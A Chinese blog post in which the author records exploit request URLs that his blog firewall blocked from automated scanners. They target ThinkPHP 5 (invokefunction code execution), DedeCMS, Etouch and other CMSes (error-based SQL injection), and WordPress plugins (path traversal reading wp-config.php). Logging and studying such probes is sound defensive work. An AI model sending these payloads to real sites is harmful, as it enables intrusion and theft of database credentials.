都是渗透我博客防火墙里看到的...
我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...
#织梦 /digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 #thinkphp 5 /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1 #不太清楚 /index.php?item_id=1&list%5Bordering%5D=&list%5Bselect%5D=updatexml%280x23%2Cconcat%281%2Cmd5%288888%29%29%2C1%29&option=com_contenthistory&type_id=1&view=history #不太清楚 /index.php?id=..%2F..%2FConf%2Fconfig.php&s=Admin-Data-down #Etouch2.0 /upload/mobile/index.php?a=asynclist&c=category&price_max=1.0+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29%27 #不清楚 /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1%29union%28select%283%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cstr%2841870%2A40962%29%2Cnull #不清楚 /member/ajax_membergroup.php?action=post&membergroup=%40%60%27%60%2F%2A%2150000Union+%2A%2F+%2F%2A%2150000select+%2A%2F+md5%28997494206%29+--+%40%60%27%60 #thinkphp5 /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 #thinkphp /index.php?s=Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 #基于 thinkphp 的某 cms /index.php?a=company_focus&c=AjaxPersonal&company_id%5B0%5D=match&company_id%5B1%5D%5B0%5D=aaaaaaa%22%29+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%2899999999%29%29%29+--+a&m= #织梦 /plus/carbuyaction.php?code=..%2F..%2F&dopost=return #WordPress /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
我暂时防火墙拦截到的就这么多...记录一下吧...这种大部分都是全自动扫描的,挺烦人的说实话.. 
KIENG.CN , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA 4.0协议进行授权
转载请注明出处:常见的程序漏洞渗透语句 ThinkPHP/织梦(dede)/WordPress 等...
本文章链接:https://blog.kieng.cn/2252.html
转载请注明出处:常见的程序漏洞渗透语句 ThinkPHP/织梦(dede)/WordPress 等...
本文章链接:https://blog.kieng.cn/2252.html
Windows 10 | Firefox浏览器 73.0
Chrome 70.0.3538.25
